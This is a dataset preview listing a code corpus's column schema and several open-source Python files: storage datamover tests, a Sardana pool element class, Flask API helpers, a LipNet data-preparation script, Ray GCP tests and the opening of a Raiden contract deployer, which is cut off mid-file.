Each record below carries the columns listed here (name, dtype, and the observed range of values or string lengths; ⌀ marks a column that also contains nulls):

| Column | Dtype | Observed values / lengths |
|---|---|---|
| hexsha | string | lengths 40-40 |
| size | int64 | 1 to 1.03M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | lengths 3-239 |
| max_stars_repo_name | string | lengths 5-130 |
| max_stars_repo_head_hexsha | string | lengths 40-78 |
| max_stars_repo_licenses | sequence | lengths 1-10 |
| max_stars_count | int64 | 1 to 191k ⌀ |
| max_stars_repo_stars_event_min_datetime | string | lengths 24-24 ⌀ |
| max_stars_repo_stars_event_max_datetime | string | lengths 24-24 ⌀ |
| max_issues_repo_path | string | lengths 3-239 |
| max_issues_repo_name | string | lengths 5-130 |
| max_issues_repo_head_hexsha | string | lengths 40-78 |
| max_issues_repo_licenses | sequence | lengths 1-10 |
| max_issues_count | int64 | 1 to 67k ⌀ |
| max_issues_repo_issues_event_min_datetime | string | lengths 24-24 ⌀ |
| max_issues_repo_issues_event_max_datetime | string | lengths 24-24 ⌀ |
| max_forks_repo_path | string | lengths 3-239 |
| max_forks_repo_name | string | lengths 5-130 |
| max_forks_repo_head_hexsha | string | lengths 40-78 |
| max_forks_repo_licenses | sequence | lengths 1-10 |
| max_forks_count | int64 | 1 to 105k ⌀ |
| max_forks_repo_forks_event_min_datetime | string | lengths 24-24 ⌀ |
| max_forks_repo_forks_event_max_datetime | string | lengths 24-24 ⌀ |
| content | string | lengths 1 to 1.03M |
| avg_line_length | float64 | 1 to 958k |
| max_line_length | int64 | 1 to 1.03M |
| alphanum_fraction | float64 | 0 to 1 |

The records themselves follow as pipe-separated rows in this column order. Because each record's `content` cell holds a complete source file, a single record spans many lines of the preview.
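The records are easier to inspect programmatically than by reading the flattened rows directly. The snippet below is a minimal sketch, assuming the table is published as a Hugging Face `datasets` dataset; the identifier is a placeholder, not the real name of this table.

```python
from datasets import load_dataset

# "<dataset-id>" is a placeholder; substitute the actual dataset path.
ds = load_dataset("<dataset-id>", split="train", streaming=True)

row = next(iter(ds))
# Repository / file identification columns.
print(row["max_stars_repo_name"], row["max_stars_repo_path"], row["size"])
# The full source file is stored in the `content` column.
print(row["content"][:200])
```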
794614ab79d39b1eb5b619569e5e1b28d03c5c7b | 7,774 | py | Python | src/tests/ftest/datamover/posix_meta_entry.py | fedepad/daos | ac71a320b8426b1eeb1457b0b6f5e6e115dfc9aa | ["BSD-2-Clause-Patent"] | 429 | 2016-09-28T20:43:20.000Z | 2022-03-25T01:22:50.000Z | src/tests/ftest/datamover/posix_meta_entry.py | fedepad/daos | ac71a320b8426b1eeb1457b0b6f5e6e115dfc9aa | ["BSD-2-Clause-Patent"] | 6,341 | 2016-11-24T12:34:26.000Z | 2022-03-31T23:53:46.000Z | src/tests/ftest/datamover/posix_meta_entry.py | fedepad/daos | ac71a320b8426b1eeb1457b0b6f5e6e115dfc9aa | ["BSD-2-Clause-Patent"] | 202 | 2016-10-30T14:47:53.000Z | 2022-03-30T21:29:11.000Z |
#!/usr/bin/python
'''
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
'''
from data_mover_test_base import DataMoverTestBase
from os.path import join
class DmvrPosixMetaEntry(DataMoverTestBase):
# pylint: disable=too-many-ancestors
"""Test class for POSIX DataMover entry metadata validation.
Test Class Description:
Tests metadata preservation on POSIX entries.
I.e. files, directories, symlinks.
:avocado: recursive
"""
def test_dm_posix_meta_entry_dcp(self):
"""JIRA id: DAOS-6390
Test Description:
Verifies that POSIX metadata is preserved for dcp.
:avocado: tags=all,full_regression
:avocado: tags=datamover,dcp,dfuse
:avocado: tags=dm_posix_meta_entry,dm_posix_meta_entry_dcp
"""
self.run_dm_posix_meta_entry("DCP")
def run_dm_posix_meta_entry(self, tool):
"""
Use Cases:
Create pool1.
Create cont1 and cont2 in pool1.
Create a source directory in cont1 that contains:
1 directory, 1 file, 1 symlink.
xattrs on the directory and file.
Create a similar source directory in an external POSIX file system.
Copy the DAOS source to another DAOS directory.
Copy the DAOS source to an external POSIX file system.
Copy the POSIX source to another DAOS directory.
For each case, verify that permissions and owners are preserved.
Repeat each case, but with the --preserve flag.
For each case, verify that xattrs and timestamps are preserved.
Args:
tool (str): The DataMover tool to run the test with.
Must be a valid tool in self.TOOLS.
"""
# Set the tool to use
self.set_tool(tool)
# Get preserve level
preserve_on = self.params.get(
"preserve", "/run/{}/*".format(self.tool.lower()))
test_desc = self.test_id + " (preserve={})".format(str(preserve_on))
# Start dfuse to hold all pools/containers
self.start_dfuse(self.dfuse_hosts)
# Create 1 pool
pool1 = self.create_pool()
# Create 1 source container with test data
cont1 = self.create_cont(pool1)
daos_src_path = self.new_daos_test_path(False)
dfuse_src_path = "{}/{}/{}{}".format(
self.dfuse.mount_dir.value, pool1.uuid, cont1.uuid, daos_src_path)
self.create_data(dfuse_src_path)
# Create 1 source posix path with test data
posix_src_path = self.new_posix_test_path(parent=self.workdir)
self.create_data(posix_src_path)
# Run each variation with and without the --preserve option
# For each case, create a new destination directory.
# For DAOS, cont1 is used as the source and destination.
# DAOS -> DAOS
daos_dst_path = self.new_daos_test_path(False)
dfuse_dst_path = "{}/{}/{}{}".format(
self.dfuse.mount_dir.value, pool1.uuid, cont1.uuid, daos_dst_path)
self.run_datamover(
test_desc + "(DAOS->DAOS)",
"DAOS", daos_src_path, pool1, cont1,
"DAOS", daos_dst_path, pool1, cont1)
self.compare_data(
dfuse_src_path, dfuse_dst_path,
cmp_times=preserve_on, cmp_xattr=preserve_on)
# DAOS -> POSIX
posix_dst_path = self.new_posix_test_path(create=False, parent=self.workdir)
self.run_datamover(
test_desc + "(DAOS->POSIX)",
"DAOS", daos_src_path, pool1, cont1,
"POSIX", posix_dst_path)
self.compare_data(
dfuse_src_path, posix_dst_path,
cmp_times=preserve_on, cmp_xattr=preserve_on)
# POSIX -> DAOS
daos_dst_path = self.new_daos_test_path(False)
dfuse_dst_path = "{}/{}/{}{}".format(
self.dfuse.mount_dir.value, pool1.uuid, cont1.uuid, daos_dst_path)
self.run_datamover(
test_desc + "(POSIX->DAOS)",
"POSIX", posix_src_path, None, None,
"DAOS", daos_dst_path, pool1, cont1)
self.compare_data(
posix_src_path, dfuse_dst_path,
cmp_times=preserve_on, cmp_xattr=preserve_on)
def create_data(self, path):
"""Create the test data.
Args:
path (str): Where to create the data.
"""
cmd_list = [
# One directory
"mkdir -p '{}'".format(join(path, "dir1")),
"pushd '{}'".format(path),
# xattrs for the directory
"setfattr -n 'user.dir1_attr1' -v 'dir1_value1' 'dir1'",
"setfattr -n 'user.dir1_attr2' -v 'dir1_value2' 'dir1'",
# One file in the directory
"echo 'test_data' > 'dir1/file1'",
# xattrs for the file
"setfattr -n 'user.file1_attr1' -v 'file1_value1' 'dir1/file1'",
"setfattr -n 'user.file1_attr2' -v 'file1_value2' 'dir1/file1'",
# One symlink in the directory
"ln -s 'file1' 'dir1/link1'",
"popd"
]
self.execute_cmd_list(cmd_list)
def compare_data(self, path1, path2, cmp_filetype=True,
cmp_perms=True, cmp_owner=True, cmp_times=False,
cmp_xattr=False):
"""Compare the test data.
Args:
path1 (str): The left-hand side to compare.
path2 (str): The right-hand side to compare.
cmp_filetype (bool, optional): Whether to compare the filetype.
Default is True.
cmp_perms (bool, optional): Whether to compare the permissions.
Default is True.
cmp_owner (bool, optional): Whether to compare the user and group
ownership. Default is True.
cmp_times (bool, optional): Whether to compare mtime.
Default is False.
cmp_xattr (bool, optional): Whether to compare xattrs.
Default is False.
"""
self.log.info("compare_data('%s', '%s')", path1, path2)
# Generate the fields to compare
field_printf = ""
if cmp_filetype:
field_printf += "File Type: %F\\n"
if cmp_perms:
field_printf += "Permissions: %A\\n"
if cmp_owner:
field_printf += "Group Name: %G\\n"
field_printf += "User Name: %U\\n"
if cmp_times:
field_printf += "mtime: %Y\\n"
# Diff the fields for each entry
for entry in ["dir1", "dir1/file1", "dir1/link1"]:
entry1 = join(path1, entry)
entry2 = join(path2, entry)
if field_printf:
# Use stat to get perms, etc.
stat_cmd1 = "stat --printf '{}' '{}'".format(
field_printf, entry1)
stat_cmd2 = "stat --printf '{}' '{}'".format(
field_printf, entry2)
diff_cmd = "diff <({} 2>&1) <({} 2>&1)".format(
stat_cmd1, stat_cmd2)
self.execute_cmd(diff_cmd)
if cmp_xattr:
# Use getfattr to get the xattrs
xattr_cmd1 = "getfattr -d -h '{}'".format(entry1)
xattr_cmd2 = "getfattr -d -h '{}'".format(entry2)
diff_cmd = "diff -I '^#' <({} 2>&1) <({} 2>&1)".format(
xattr_cmd1, xattr_cmd2)
self.execute_cmd(diff_cmd)
def execute_cmd_list(self, cmd_list):
"""Execute a list of commands, separated by &&.
Args:
cmd_list (list): A list of commands to execute.
"""
cmd = " &&\n".join(cmd_list)
self.execute_cmd(cmd)
| 37.921951 | 84 | 0.574479 |
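The trailing three cells of every record (`avg_line_length`, `max_line_length`, `alphanum_fraction`) are derived from the `content` cell. The helper below is a plausible reconstruction of those derivations; the exact definitions used to build this table are not stated here, so treat it as an assumption.

```python
def content_stats(content: str):
    """Recompute the three derived columns for one record (assumed definitions)."""
    line_lengths = [len(line) for line in content.splitlines()] or [0]
    avg_line_length = sum(line_lengths) / len(line_lengths)
    max_line_length = max(line_lengths)
    alphanum_fraction = (
        sum(ch.isalnum() for ch in content) / len(content) if content else 0.0
    )
    return avg_line_length, max_line_length, alphanum_fraction
```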
794615a1ea1925c7f64e9425ece5961482fc6bce | 13,173 | py | Python | src/sardana/pool/poolbaseelement.py | tacaswell/sardana | be8d64d34234b35a37b4cd8233e86fcda13f64b8 | ["CC-BY-3.0"] | null | null | null | src/sardana/pool/poolbaseelement.py | tacaswell/sardana | be8d64d34234b35a37b4cd8233e86fcda13f64b8 | ["CC-BY-3.0"] | null | null | null | src/sardana/pool/poolbaseelement.py | tacaswell/sardana | be8d64d34234b35a37b4cd8233e86fcda13f64b8 | ["CC-BY-3.0"] | null | null | null |
#!/usr/bin/env python
##############################################################################
##
# This file is part of Sardana
##
# http://www.sardana-controls.org/
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Sardana is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Sardana is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
# You should have received a copy of the GNU Lesser General Public License
# along with Sardana. If not, see <http://www.gnu.org/licenses/>.
##
##############################################################################
"""This module is part of the Python Pool library. It defines the base classes
for"""
__all__ = ["PoolBaseElement"]
__docformat__ = 'restructuredtext'
import weakref
import threading
from taurus.core.util.lock import TaurusLock
from sardana import State
from sardana.sardanaevent import EventType
from sardana.pool.poolobject import PoolObject
class PoolBaseElement(PoolObject):
"""A Pool object that besides the name, reference to the pool, ID, full_name
and user_full_name has:
- _simulation_mode : boolean telling if in simulation mode
- _state : element state
- _status : element status"""
def __init__(self, **kwargs):
self._simulation_mode = False
self._state = None
self._state_event = None
self._status = None
self._status_event = None
self._action_cache = None
self._aborted = False
self._stopped = False
lock_name = kwargs['name'] + "Lock"
# A lock for high level operations: monitoring, motion or acquisition
self._lock = TaurusLock(name=lock_name, lock=threading.RLock())
# The operation context in which the element is involved
self._operation = None
# The :class:`PoolAction` in which element is involved
self._pool_action = None
super(PoolBaseElement, self).__init__(**kwargs)
def __enter__(self):
self.lock()
def __exit__(self, exc_type, exc_value, traceback):
self.unlock()
return False
def lock(self, blocking=True):
"""Acquires the this element lock
:param blocking:
whether or not to block if lock is already acquired [default: True]
:type blocking: bool"""
ret = self._lock.acquire(blocking)
return ret
def unlock(self):
ret = self._lock.release()
return ret
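    # Usage sketch (illustrative, not taken from the upstream module): because of
    # __enter__/__exit__ above, callers can serialize a high-level operation as
    #     with element:
    #         element.set_operation(action)
    #         ...
    #         element.clear_operation()
    # which acquires and releases the element's TaurusLock around the block.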
def get_action_cache(self):
"""Returns the internal action cache object"""
return self._action_cache
def serialize(self, *args, **kwargs):
ret = PoolObject.serialize(self, *args, **kwargs)
return ret
# --------------------------------------------------------------------------
# simulation mode
# --------------------------------------------------------------------------
def get_simulation_mode(self, cache=True, propagate=1):
"""Returns the simulation mode for this object.
:param cache: not used [default: True]
:type cache: bool
:param propagate: [default: 1]
:type propagate: int
:return: the current simulation mode
:rtype: bool"""
return self._simulation_mode
def set_simulation_mode(self, simulation_mode, propagate=1):
self._simulation_mode = simulation_mode
if not propagate:
return
if simulation_mode == self._simulation_mode:
# current state is equal to last state_event. Skip event
return
self.fire_event(EventType("simulation_mode", priority=propagate),
simulation_mode)
def put_simulation_mode(self, simulation_mode):
self._simulation_mode = simulation_mode
simulation_mode = property(get_simulation_mode, set_simulation_mode,
doc="element simulation mode")
# --------------------------------------------------------------------------
# state
# --------------------------------------------------------------------------
def get_state(self, cache=True, propagate=1):
"""Returns the state for this object. If cache is True (default) it
returns the current state stored in cache (it will force an update if
cache is empty). If propagate > 0 and if the state changed since last
read, it will propagate the state event to all listeners.
:param cache:
tells if return value from local cache or update from HW read
[default: True]
:type cache: bool
:param propagate:
if > 0 propagates the event in case it changed since last HW read.
            Values bigger than 1 mean the event, if sent, should be a priority event
[default: 1]
:type propagate: int
:return: the current object state
:rtype: :obj:`sardana.State`"""
if not cache or self._state is None:
state_info = self.read_state_info()
self._set_state_info(state_info, propagate=propagate)
return self._state
def inspect_state(self):
"""Looks at the current cached value of state
:return: the current object state
:rtype: :obj:`sardana.State`"""
return self._state
def set_state(self, state, propagate=1):
self._set_state(state, propagate=propagate)
def _set_state(self, state, propagate=1):
self._state = state
if not propagate:
return
if state == self._state_event:
# current state is equal to last state_event. Skip event
return
self._state_event = state
self.fire_event(EventType("state", priority=propagate), state)
def put_state(self, state):
self._state = state
state = property(get_state, set_state, doc="element state")
# --------------------------------------------------------------------------
# status
# --------------------------------------------------------------------------
def inspect_status(self):
"""Looks at the current cached value of status
:return: the current object status
:rtype: :obj:`str`
"""
return self._status
def get_status(self, cache=True, propagate=1):
"""Returns the status for this object. If cache is True (default) it
returns the current status stored in cache (it will force an update if
cache is empty). If propagate > 0 and if the status changed since last
read, it will propagate the status event to all listeners.
:param cache:
tells if return value from local cache or update from HW read
[default: True]
:type cache: bool
:param propagate:
if > 0 propagates the event in case it changed since last HW read.
            Values bigger than 1 mean the event, if sent, should be a priority event
[default: 1]
:type propagate: int
:return: the current object status
:rtype: :obj:`str`
"""
if not cache or self._status is None:
state_info = self.read_state_info()
self._set_state_info(state_info, propagate=propagate)
return self._status
def set_status(self, status, propagate=1):
self._set_status(status, propagate=propagate)
def _set_status(self, status, propagate=1):
self._status = status
if not propagate:
return
s_evt = self._status_event
if s_evt is not None and len(status) == len(s_evt) and status == s_evt:
# current status is equal to last status_event. Skip event
return
self._status_event = status
self.fire_event(EventType("status", priority=propagate), status)
def put_status(self, status):
self._status = status
status = property(get_status, set_status, doc="element status")
# --------------------------------------------------------------------------
# state information
# --------------------------------------------------------------------------
_STD_STATUS = "{name} is {state}\n{ctrl_status}"
def calculate_state_info(self, status_info=None):
"""Transforms the given state information. This specific base
implementation transforms the given state,status tuple into a
state, new_status tuple where new_status is "*self.name* is *state*
plus the given status.
It is assumed that the given status comes directly from the controller
status information.
:param status_info:
            given status information [default: None, meaning use the current state and status]
:type status_info: tuple<State, str>
:return: a transformed state information
:rtype: tuple<State, str>"""
if status_info is None:
status_info = self._state, self._status
state, status = status_info
state_str = State[state]
new_status = self._STD_STATUS.format(name=self.name, state=state_str,
ctrl_status=status)
return status_info[0], new_status
def set_state_info(self, state_info, propagate=1):
self._set_state_info(state_info, propagate=propagate)
def _set_state_info(self, state_info, propagate=1):
state_info = self.calculate_state_info(state_info)
state, status = state_info[:2]
self._set_status(status, propagate=propagate)
self._set_state(state, propagate=propagate)
def read_state_info(self):
action_cache = self.get_action_cache()
ctrl_state_info = action_cache.read_state_info(serial=True)[self]
return self._from_ctrl_state_info(ctrl_state_info)
def put_state_info(self, state_info):
self.set_state_info(state_info, propagate=0)
def _from_ctrl_state_info(self, state_info):
try:
state_str = State.whatis(state_info)
return int(state_info), "{0} is in {1}".format(self.name, state_str)
except KeyError:
pass
state_info, _ = state_info
state, status = state_info[:2]
state = int(state)
return state, status
# --------------------------------------------------------------------------
# default attribute
# --------------------------------------------------------------------------
def get_default_attribute(self):
return NotImplementedError("%s doesn't have default attribute" % self.__class__.__name__)
# --------------------------------------------------------------------------
# default acquisition channel name
# --------------------------------------------------------------------------
def get_default_acquisition_channel(self):
return self.get_default_attribute().name
# --------------------------------------------------------------------------
# stop
# --------------------------------------------------------------------------
def stop(self):
self._stopped = True
def was_stopped(self):
return self._stopped
# --------------------------------------------------------------------------
# abort
# --------------------------------------------------------------------------
def abort(self):
self._aborted = True
def was_aborted(self):
return self._aborted
# --------------------------------------------------------------------------
# interrupted
# --------------------------------------------------------------------------
def was_interrupted(self):
"""Tells if action ended by an abort or stop"""
return self.was_aborted() or self.was_stopped()
# --------------------------------------------------------------------------
# involved in an operation
# --------------------------------------------------------------------------
def is_action_running(self):
"""Determines if the element action is running or not."""
return self.get_action_cache().is_running()
def is_in_operation(self):
"""Returns True if this element is involved in any operation"""
return self.get_operation() is not None
def is_in_local_operation(self):
return self.get_operation() == self.get_action_cache()
def get_operation(self):
return self._operation
def set_operation(self, operation):
if self.is_in_operation() and operation is not None:
raise Exception("%s is already involved in an operation"
% self.name)
if operation is not None:
self._aborted = False
self._stopped = False
self._operation = operation
def clear_operation(self):
return self.set_operation(None)
| 36.18956 | 97 | 0.562211 |
794615d14fcb23899eb3c4e7a590ab75d10dc1d8 | 2,155 | py | Python | flaskr/handyfunctions.py | tuilagio/wordNotify-rev1 | 4db3216182ac2a0b273906805a3c8005326d6e25 | ["BSD-3-Clause"] | null | null | null | flaskr/handyfunctions.py | tuilagio/wordNotify-rev1 | 4db3216182ac2a0b273906805a3c8005326d6e25 | ["BSD-3-Clause"] | 2 | 2021-03-10T15:48:08.000Z | 2021-10-06T16:00:56.000Z | flaskr/handyfunctions.py | tuilagio/wordNotify-rev1 | 4db3216182ac2a0b273906805a3c8005326d6e25 | ["BSD-3-Clause"] | null | null | null |
import base64, json
import requests
from werkzeug.security import generate_password_hash
url_base = 'http://127.0.0.1:5000'
get_dicts = '/api/v1/dicts' # lang=${lang}&random=true
# user="tom"
# password="thisIStom"
# encoded_u = base64.b64encode((user+":"+password).encode()).decode()
# headers = {'Content-Type': 'application/json',
# "Authorization": "Basic %s" % encoded_u}
# response = requests.get('http://127.0.0.1:5000/api/v1/resources/dicts?lang=DE_EN&random=true', auth=HTTPBasicAuth('tom', 'thisIStom')).content.decode('utf-8')
# json.loads(
def get_dict_by_param(encoded_u, dict_id="", url_only=False):
if dict_id != "":
dict_id = "/"+dict_id
url_full = f"{url_base}{get_dicts}{dict_id}"
print(url_full)
headers = {'Content-Type': 'application/json',
"Authorization": "Basic %s" % encoded_u}
response = requests.get(url_full, headers=headers)
if url_only:
return url_full
if response.status_code == 200:
return json.loads(response.content.decode('utf-8')), url_full
else:
return None
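# Illustrative call sequence (assumes the Flask API above is running locally; the
# credentials and ids are only examples):
#     encoded_u = base64.b64encode("tom:thisIStom".encode()).decode()
#     data, url = get_dict_by_param(encoded_u, dict_id="DE_EN")
#     word, url = get_word_by_param(encoded_u, dict_id="DE_EN", word_id="42")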
def get_word_by_param(encoded_u, dict_id="", word_id="", url_only=False):
# callsign = "&random=true" if id=="" else f"&id={id}"
if word_id != "":
word_id = "/"+word_id
url_full = f"{url_base}{get_dicts}/{dict_id}/words{word_id}"
print(url_full)
headers = {'Content-Type': 'application/json',
"Authorization": "Basic %s" % encoded_u}
response = requests.get(url_full, headers=headers)
if url_only:
return url_full
if response.status_code == 200:
return json.loads(response.content.decode('utf-8')), url_full
else:
return None
def update_config(app, new_config):
app.config["GLOBAL_CONFIG"] = new_config
user = new_config["settings"]["API_username"]
password = new_config["settings"]["API_password"]
users = {
user: generate_password_hash(password),
"jerry": generate_password_hash("ThatisJerry")
}
encoded_u = base64.b64encode((user+":"+password).encode()).decode()
app.config.from_mapping(
USERS=users,
ENCODED_U=encoded_u,
    )
| 36.525424 | 160 | 0.655684 |
794616108a8c564f6d383d75332328a9d50565ef | 2,457 | py | Python | training/overlapped_speakers/prepare.py | dimaxano/LipNet | 5990b0a0a5331ccbc2c110dfcbbf1b08e1704d19 | ["MIT"] | 560 | 2017-04-20T06:22:10.000Z | 2022-03-31T06:47:15.000Z | training/overlapped_speakers/prepare.py | dimaxano/LipNet | 5990b0a0a5331ccbc2c110dfcbbf1b08e1704d19 | ["MIT"] | 123 | 2017-04-25T11:41:45.000Z | 2022-03-11T23:11:38.000Z | training/overlapped_speakers/prepare.py | dimaxano/LipNet | 5990b0a0a5331ccbc2c110dfcbbf1b08e1704d19 | ["MIT"] | 241 | 2017-05-03T14:27:05.000Z | 2022-03-06T08:38:44.000Z |
import os
import glob
import subprocess
import sys
'''
This script prepare training folder and its dataset for each speaker.
- Folder s{i}/datasets/train would contain original DATASET_VIDEO - s{i} with 0 <= i < VAL_SAMPLES
- Folder s{i}/datasets/val would contain s{i} >= VAL_SAMPLES
- Folder s{i}/datasets/align would contain all your *.align
Usage:
$ python prepare.py [Path to video dataset] [Path to align dataset] [Number of samples]
Notes:
- [Path to video dataset] should be a folder with structure: /s{i}/[video]
- [Path to align dataset] should be a folder with structure: /[align].align
- [Number of samples] should be less than or equal to min(len(ls '/s{i}/*'))
'''
CURRENT_PATH = os.path.dirname(os.path.abspath(__file__))
DATASET_VIDEO_PATH = sys.argv[1]
DATASET_ALIGN_PATH = sys.argv[2]
VAL_SAMPLES = int(sys.argv[3])
for speaker_path in glob.glob(os.path.join(DATASET_VIDEO_PATH, '*')):
speaker_id = os.path.splitext(speaker_path)[0].split('/')[-1]
subprocess.check_output("mkdir -p '{}'".format(os.path.join(CURRENT_PATH, speaker_id, 'datasets', 'train')), shell=True)
for s_path in glob.glob(os.path.join(DATASET_VIDEO_PATH, '*')):
s_id = os.path.splitext(s_path)[0].split('/')[-1]
if s_path == speaker_path:
subprocess.check_output("mkdir -p '{}'".format(os.path.join(CURRENT_PATH, speaker_id, 'datasets', 'train', s_id)), shell=True)
subprocess.check_output("mkdir -p '{}'".format(os.path.join(CURRENT_PATH, speaker_id, 'datasets', 'val', s_id)), shell=True)
n = 0
for video_path in glob.glob(os.path.join(DATASET_VIDEO_PATH, speaker_id, '*')):
video_id = os.path.splitext(video_path)[0].split('/')[-1]
if n < VAL_SAMPLES:
subprocess.check_output("ln -s '{}' '{}'".format(video_path, os.path.join(CURRENT_PATH, speaker_id, 'datasets', 'val', s_id, video_id)), shell=True)
else:
subprocess.check_output("ln -s '{}' '{}'".format(video_path, os.path.join(CURRENT_PATH, speaker_id, 'datasets', 'train', s_id, video_id)), shell=True)
n += 1
else:
subprocess.check_output("ln -s '{}' '{}'".format(s_path, os.path.join(CURRENT_PATH, speaker_id, 'datasets', 'train', s_id)), shell=True)
subprocess.check_output("ln -s '{}' '{}'".format(DATASET_ALIGN_PATH, os.path.join(CURRENT_PATH, speaker_id, 'datasets', 'align')), shell=True) | 50.142857 | 170 | 0.658527 |
794616780fd7f37b20ade8b14629b56ac5c88531 | 411 | py | Python | queryengine/cli.py | AndyQW/queryengine | 417cb374edfcaf395e8a392bffb01fa66c82a3a9 | ["MIT"] | null | null | null | queryengine/cli.py | AndyQW/queryengine | 417cb374edfcaf395e8a392bffb01fa66c82a3a9 | ["MIT"] | null | null | null | queryengine/cli.py | AndyQW/queryengine | 417cb374edfcaf395e8a392bffb01fa66c82a3a9 | ["MIT"] | null | null | null |
"""Console script for queryengine."""
import sys
import click
@click.command()
def main(args=None):
"""Console script for queryengine."""
click.echo("Replace this message by putting your code into "
"queryengine.cli.main")
click.echo("See click documentation at https://click.palletsprojects.com/")
return 0
if __name__ == "__main__":
sys.exit(main()) # pragma: no cover
| 24.176471 | 79 | 0.671533 |
794617097fc33837304ba2e565c72a92dc686991 | 1,634 | py | Python | python/ray/tests/gcp/test_gcp_node_provider.py | 77loopin/ray | 9322f6aab53f4ca5baf5a3573e1ffde12feae519 | ["Apache-2.0"] | 21,382 | 2016-09-26T23:12:52.000Z | 2022-03-31T21:47:45.000Z | python/ray/tests/gcp/test_gcp_node_provider.py | 77loopin/ray | 9322f6aab53f4ca5baf5a3573e1ffde12feae519 | ["Apache-2.0"] | 19,689 | 2016-09-17T08:21:25.000Z | 2022-03-31T23:59:30.000Z | python/ray/tests/gcp/test_gcp_node_provider.py | gramhagen/ray | c18caa4db36d466718bdbcb2229aa0b2dc03da1f | ["Apache-2.0"] | 4,114 | 2016-09-23T18:54:01.000Z | 2022-03-31T15:07:32.000Z |
import pytest
from ray.autoscaler._private.gcp.node import GCPCompute
_PROJECT_NAME = "project-one"
_AZ = "us-west1-b"
@pytest.mark.parametrize(
"test_case", [("n1-standard-4", f"zones/{_AZ}/machineTypes/n1-standard-4"),
(f"zones/{_AZ}/machineTypes/n1-standard-4",
f"zones/{_AZ}/machineTypes/n1-standard-4")])
def test_convert_resources_to_urls_machine(test_case):
gcp_compute = GCPCompute(None, _PROJECT_NAME, _AZ, "cluster_name")
base_machine, result_machine = test_case
modified_config = gcp_compute._convert_resources_to_urls({
"machineType": base_machine
})
assert modified_config["machineType"] == result_machine
@pytest.mark.parametrize("test_case", [
("nvidia-tesla-k80",
f"projects/{_PROJECT_NAME}/zones/{_AZ}/acceleratorTypes/nvidia-tesla-k80"
),
(f"projects/{_PROJECT_NAME}/zones/{_AZ}/acceleratorTypes/nvidia-tesla-k80",
f"projects/{_PROJECT_NAME}/zones/{_AZ}/acceleratorTypes/nvidia-tesla-k80"
),
])
def test_convert_resources_to_urls_accelerators(test_case):
gcp_compute = GCPCompute(None, _PROJECT_NAME, _AZ, "cluster_name")
base_accel, result_accel = test_case
base_config = {
"machineType": "n1-standard-4",
"guestAccelerators": [{
"acceleratorCount": 1,
"acceleratorType": base_accel
}]
}
modified_config = gcp_compute._convert_resources_to_urls(base_config)
assert modified_config["guestAccelerators"][0][
"acceleratorType"] == result_accel
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", __file__]))
| 32.039216 | 79 | 0.689718 |
794617bd9eed5499fd71921428be24b53c971d83 | 15,635 | py | Python | raiden_contracts/deploy/contract_deployer.py | LefterisJP/raiden-contracts | fdcee22d22aeacb16efb58c3a324ac20c01cdb40 | ["MIT"] | 1 | 2021-04-23T03:59:00.000Z | 2021-04-23T03:59:00.000Z | raiden_contracts/deploy/contract_deployer.py | LefterisJP/raiden-contracts | fdcee22d22aeacb16efb58c3a324ac20c01cdb40 | ["MIT"] | null | null | null | raiden_contracts/deploy/contract_deployer.py | LefterisJP/raiden-contracts | fdcee22d22aeacb16efb58c3a324ac20c01cdb40 | ["MIT"] | null | null | null |
from copy import deepcopy
from logging import getLogger
from pathlib import Path
from typing import Any, Dict, List, Optional
from eth_typing import HexAddress
from eth_utils import encode_hex, is_address, to_checksum_address
from eth_utils.units import units
from web3 import Web3
from web3.contract import Contract, ContractFunction
from web3.middleware import construct_sign_and_send_raw_middleware
from raiden_contracts.constants import (
CONTRACT_MONITORING_SERVICE,
CONTRACT_ONE_TO_N,
CONTRACT_SECRET_REGISTRY,
CONTRACT_SERVICE_REGISTRY,
CONTRACT_TOKEN_NETWORK_REGISTRY,
CONTRACT_USER_DEPOSIT,
CONTRACTS_VERSION,
)
from raiden_contracts.contract_manager import CompiledContract, DeployedContract, DeployedContracts
from raiden_contracts.contract_source_manager import ContractSourceManager, contracts_source_path
from raiden_contracts.deploy.contract_verifier import ContractVerifier
from raiden_contracts.utils.file_ops import load_json_from_path
from raiden_contracts.utils.signature import private_key_to_address
from raiden_contracts.utils.transaction import check_successful_tx
from raiden_contracts.utils.versions import (
contracts_version_expects_deposit_limits,
contracts_version_has_initial_service_deposit,
)
LOG = getLogger(__name__)
class ContractDeployer(ContractVerifier):
def __init__(
self,
web3: Web3,
private_key: str,
gas_limit: int,
gas_price: int,
wait: int = 10,
contracts_version: Optional[str] = None,
):
# pylint: disable=E1101
super(ContractDeployer, self).__init__(web3=web3, contracts_version=contracts_version)
self.wait = wait
self.owner = private_key_to_address(private_key)
self.transaction = {"from": self.owner, "gas": gas_limit}
self.transaction["gasPrice"] = gas_price * int(units["gwei"])
self.web3.middleware_stack.add(construct_sign_and_send_raw_middleware(private_key))
# Check that the precompiled data matches the source code
# Only for current version, because this is the only one with source code
if self.contracts_version in [None, CONTRACTS_VERSION]:
contract_manager_source = ContractSourceManager(contracts_source_path())
contract_manager_source.verify_precompiled_checksums(self.precompiled_path)
else:
LOG.info("Skipped checks against the source code because it is not available.")
def deploy(self, contract_name: str, args: Optional[List] = None) -> Dict:
if args is None:
args = list()
contract_interface: CompiledContract = self.contract_manager.get_contract(contract_name)
# Instantiate and deploy contract
contract = self.web3.eth.contract(
abi=contract_interface["abi"], bytecode=contract_interface["bin"]
)
# Get transaction hash from deployed contract
txhash = self.send_deployment_transaction(contract=contract, args=args)
# Get tx receipt to get contract address
LOG.debug(
f"Deploying {contract_name} txHash={encode_hex(txhash)}, "
f"contracts version {self.contract_manager.contracts_version}"
)
(receipt, tx) = check_successful_tx(web3=self.web3, txid=txhash, timeout=self.wait)
if not receipt["contractAddress"]: # happens with Parity
receipt = dict(receipt)
receipt["contractAddress"] = tx["creates"]
LOG.info(
"{0} address: {1}. Gas used: {2}".format(
contract_name, receipt["contractAddress"], receipt["gasUsed"]
)
)
return receipt
def transact(self, contract_method: ContractFunction) -> Dict:
